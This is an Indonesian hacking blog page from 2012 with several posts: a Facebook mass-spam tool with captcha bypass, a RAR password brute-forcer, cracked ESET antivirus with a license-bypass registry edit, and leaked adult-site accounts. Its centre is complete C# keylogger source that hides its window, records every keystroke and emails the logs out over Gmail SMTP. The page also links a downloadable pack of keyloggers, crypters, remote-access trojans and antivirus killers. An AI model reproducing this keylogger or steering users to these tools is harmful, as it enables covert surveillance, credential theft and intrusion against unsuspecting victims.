Code Nubitol
Headlines News :
Diberdayakan oleh Blogger.

Latest Post

Facebook Blaster Pro V.7.2.0

Written By Singai on Selasa, 16 Oktober 2012 | 02.51



[Image: blaster_box.jpg]

Fully Automatic Benefits:

* Auto Mass Friend Requests
* Auto Mass Friend Messages
* Auto Mass Friend Wall Poster
* Auto Mass Friend Poker
* Auto Mass Amber Alerts
* Auto Mass Captcha Bypass
* Free Life Time Updates

FaceBook Blaster Pro is the internets # 1 Facebook friend adder marketing software tool.
Internet marketers are experiencing a gold rush of web 3.0 FREE advertising to highly targeted leads on the fastest growing social network "Facebook".
Facebook Blaster Pro can run your marketing efforts on autopilot because automation is key to your success.


Works on Windows Vista,XP,2000


Exp :

[Image: fb1.jpg]

DOWNLOAD DIMARI

Cara Membuka File RAR yang Terkunci Menggunakan Software RAR Password Unlocker 2011

RAR Password Unlocker adalah sebuah software gratis yang fungsinya membuka file RAR yang terkunci. Software ini menggunakan brute force password recovery yang dapat membantu anda memulihkan file RAR yang terkunci dan yang tidak mudah membukanya.

RAR Password Unlocker dapat bekerja pada berbagai sistem operasi mulai dari Windows 98, Windows xp, Windows 7 dan lain-lain. Kapasitas software ini 588 KB, sangat kecil dan mudah diinstal. Silahkan didownload.

Download Via Ziddu
RAR Password : didid.irmawan
Virus scan  

Cara menggunakan :
Buka RAR Password Unlocker dan instal seperti biasanya, setelah itu maka program tersebut akan terbuka. Klik select untuk mencari file RAR yang anda inginkan tentunya file tersebut terkunci, kemudian klik select yang terdapat di bawahnya lagi untuk mencari tempat dimana Password akan tersimpan, Password yang tersimpan berupa Notepad.
  
Harus diingat bahwa RAR Password Unlocker hanya dapat digunakan di file berupa type RAR.
Sedikit tips dari saya semoga bermanfaat buat teman-teman.

 

UPDATE) PornHub.com premium acc(all with credit)

Written By Singai on Senin, 15 Oktober 2012 | 13.57

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Tool buat nyari music , buku , video , dll

Belajar buat keyloger Upload ke GMAIL



Dapet source dari dari Mamang Computer Analysis Lumayan Buat Bahan2..:D
kenapa saya make gmail yah emang gmail kapasitas nya cukup lumayan buat nampung2..

ok langsung aja..
nih Pelototin source C# nyak...^_^

Code: (Select All)
using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Runtime.InteropService s;
using System.Net.Mail;


//Author: ComputerAnalysis
//The Computer Analysis: Episode 2
//This code is designated for educational use only.
//Please do not plagiarize my code.
//I do not take responsiblity for any illegal uses of this code.

namespace KeyLogger
{
    class Program
    {
        [DllImport("user32.dll")]
        private static extern short GetAsyncKeyState(int vKey);
      
        [DllImport("user32.dll")]
        public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);
      
        [DllImport("user32.dll")]
        static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

        static void Main(string[] args)
        {

            IntPtr hWnd = FindWindow(null, Console.Title); //Title of window that is to be closed.
          
            if (hWnd != IntPtr.Zero)
            {

                //Hide the window

                ShowWindow(hWnd, 0); // 0 = SW_HIDE

            }

          
            string log = "";

            nextLog:
            while (log.Length < 2500)
            {
                for (int i = 1; i < 255; i++)
                {
                    int result = GetAsyncKeyState(i);
                  
                    if (result != 0)
                    {
                      
                        log = log + checkExceptions(i);
                        System.Threading.Thread.Sleep(115); //115 works best for my computer.
                         //You may have to play around with the value.

                    }
                  

                }
              
            }

            DateTime current = DateTime.Now;
            string date = current.ToString();
          
          
            date = date.Replace(':','_');
            date = date.Replace('/', '_');
            string filePath = @"C:\Documents and Settings\All Users\Log_" + date + @".txt";
            FileStream myLog = new FileStream(filePath, FileMode.CreateNew, FileAccess.Write);
            StreamWriter sw = new StreamWriter(myLog);
            sw.Write(log);
            sw.Close();
            myLog.Close();

          
            SendMail("smtp.gmail.com", 587, "username", "password", "username@gmail.com", "username@gmail.com", "Key log for " + DateTime.Now.ToString(), "New Log from " + System.Environment.MachineNam e, true, filePath);
            log = "";
            goto nextLog;
          
          
        }

        public static string checkExceptions(int i) // makes log files easier to read and cleaner
        {
            switch (i)
            {
                case 1:
                    return "<Left Click>";
                case 2:
                    return "<Right Click>";
                case 13:
                    return "<Enter>";
                case 9:
                    return "<Tab>";
                case 20:
                    return "<Caps Lock>";
                case 160:
                    return "<Left Shift>";
                case 161:
                    return "<Right Shift>";
                case 16:
                    return "";
                case 162:
                    return "<Ctrl>";
                case 163:
                    return "<Ctrl>";
                case 17:
                    return "";
                case 164:
                    return "<Alt>";
                case 165:
                    return "<Alt>";
                case 18:
                    return "";
                case 93:
                    return "<Menu Key>";
                case 37:
                    return "<Left Arrow>";
                case 39:
                    return "<Right Arrow>";
                case 38:
                    return "<Up Arrow>";
                case 40:
                    return "<Down Arrow>";
                case 220:
                    return "\\";
                case 191:
                    return "/";
                case 222:
                    return "'";
                case 186:
                    return ";";
                case 8:
                    return "<BackSpace>";
                case 33:
                    return "<Page Up>";
                case 34:
                    return "<Page Down>";
                case 35:
                    return "<End>";
                case 36:
                    return "<Home>";
                case 144:
                    return "<Num Lk>";
                case 44:
                    return "<Prnt Scrn>";
                case 45:
                    return "<Insert>";
                case 112:
                    return "<F1>";
                case 113:
                    return "<F2>";
                case 114:
                    return "<F3>";
                case 115:
                    return "<F4>";
                case 116:
                    return "<F5>";
                case 117:
                    return "<F6>";
                case 118:
                    return "<F7>";
                case 119:
                    return "<F8>";
                case 120:
                    return "<F9>";
                case 121:
                    return "<F10>";
                case 122:
                    return "<F11>";
                case 123:
                    return "<F12>";
                case 219:
                    return "[";
                case 221:
                    return "]";
                case 189:
                    return "-";
                case 187:
                    return "=";
                case 91:
                    return "<Windows Key>";
                case 188:
                    return ",";
                case 190:
                    return ".";
                default:
                    return ((char)i).ToString();
            }
        }

        public static void SendMail(string host, int port, string userName, string pswd, string fromAddress, string toAddress, string body, string subject, bool sslEnabled, string fileName)
        {

            Attachment att = new Attachment(fileName);
            MailMessage msg = new MailMessage(new MailAddress(fromAddress), new MailAddress(toAddress));
            //  Create a MailMessage object with a from and to address
            msg.Subject = subject;
            //  Add your subject
            msg.SubjectEncoding = System.Text.Encoding.UTF8;
            msg.Body = body;
            //  Add the body of your message
            msg.BodyEncoding = System.Text.Encoding.UTF8;
            msg.IsBodyHtml = false; //  Does the body contain html
            msg.Attachments.Add(att);
            SmtpClient client = new SmtpClient(host, port);
            //  Create an instance of SmtpClient with your smtp host and port
            client.Credentials = new System.Net.NetworkCredential(userName, pswd);
            //  Assign your username and password to connect to gmail
            client.EnableSsl = sslEnabled;  //  Enable SSL
            try
            {
                client.Send(msg);   //  Try to send your message
                Console.WriteLine("Your message was sent successfully.");
                //  A method to update a ui element with a message

            }
            catch (SmtpException ex)
            {
                Console.WriteLine("There was an error sending your message. {0}", ex.Message);
            }
        }
    }
}


script di atas bisa di kembangin lagi yak.... itu cuma standar langsung dari mamang computer analysis...
cekidot hasilnya gan...~O)>:D<

http://i45.tinypic.com/efpj43.jpg

  ini  bentuk script mentah nya... make nya di compile dulu om itu kebetulan make bahasa pemograman c#... jadi compile nya make visual studio...
 
 
cara lain


itu di compile pake visual studio kebetulan ane make c# ... sedikit basic script dari keyloger om... kalo yang c++ pernah coba bikin tutornya juga tpi biasa gak pake upload read ma write aja... http://rapidshare.com/files/164909968/keygencpp.rar
 
 

Hack Pack! 33 Hacking Tools (pro)



KEYLOGGERS & PASSWORD STEALING:

- Ardamax 2.8
- Ardamax 3.0
- Fake Messenger w/ password retriever (Revenge Messenger)
- Silent Keylogger by BUNNN
- Digital Keylogger v3.3
- Infinity YouTube cracker (doesn't work according to many but its still present)

CRYPTERS AND BINDERS:

- File Joiner v2.01
- File Injector v3
- Xeus Technologies HotFusion binder
- Japabrz's Csharp crypter
- Daemon Crypt V2
- Crypter v1.2
- nBinder v5.5 premium
- Easy Binder v2
- Shell Labs Icon Changer
- ShockLabs file binder
- uBinder v1.30 SE (someone's private binder, it is almost FUD)

FREEZERS & BOMBERS:

- Frozen Land MSN Freezer v1
- Facebook Freezer
- Hotmail Lockers
- Email Bomber (an HTML page, no exe required!)

RATS:

- Beast v2.07
- BitFrost v1.2
- Dark Moon v4.11
- Lost Door v2.2 Stable public edition
- MiniMo v0.7 public beta
- Nuclear RAT v2.1.0
- Optix v1.33
- PaiN RAT 0.1 beta 9
- Poison Ivy v2.3.2
- Shark 3
- Spy-Net v.1.7
- Y3 RAT v2.5 RC 10

OTHERS:

- Proxy Switch v3.9 Ultimate
- Savk AV Killers (all 5 safe and deadly versions)
- Ardamax keylogger remover
NOTE: All software is full and cracks/serials are included, there are no trials or demos.

SAFETY: It would be best to run all these tools either Sandboxed, or from a Virtual Machine.

http://www.mediafire.com/?t6lygqjyddl78aj

password (klo di minta): shytex.com

ESET Smart Security



[Image: esetwr7.png]


DOWNLOAD
WINDOWS
Smart Security
ESET Smart Security 5.2.9.1 Microsoft Windows 2000/XP/Vista/7 (32-bit)
ESET Smart Security 5.2.9.1 Microsoft Windows XP/Vista/7 (64-bit)

NOD32 Antivirus
ESET NOD32 Antivirus 5.2.9.1 Microsoft Windows 2000/XP/Vista/7 (32-bit)
ESET NOD32 Antivirus 5.2.9.1 Microsoft Windows XP/Vista/7 (64-bit)

MAC
OS X 10.8.x (Mountain Lion)/10.7.x (Lion)/Mac OS X 10.6.x (Snow Leopard)/10.5.x (Leopard) Version: 4.1.86.4

LINUX
Red Hat/Mandriva/SUSE/Debian/Ubuntu/Fedora (32-bit) Version: 4.0.77.0
Red Hat/Mandriva/SUSE/Debian/Ubuntu/Fedora (64-bit) Version: 4.0.77.2


update offline eset nod32 antivirus database versi 7392
Bisa dipakai di eset endpoint, versi 6 RC, versi 5 dan eset versi 4
http://shop.web.id/n32upd/

CARA UPDATE OFFLINE
PERTAMA MATIKAN HIPS LALU RESTART
*boot to Safe Mode
*Start > Run > Regedit
*open key: HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info
*edit value "PackageFeatures" from "00000003" to "00000001"
*restart
klik eset, pencet f5 pilih update pada menu sebelah kiri, pada sebelah kanan ada update server klik tombol edit nya, masukkan direktory tempat offline update di extract pada kolom update servers:
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Code Nubitol - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger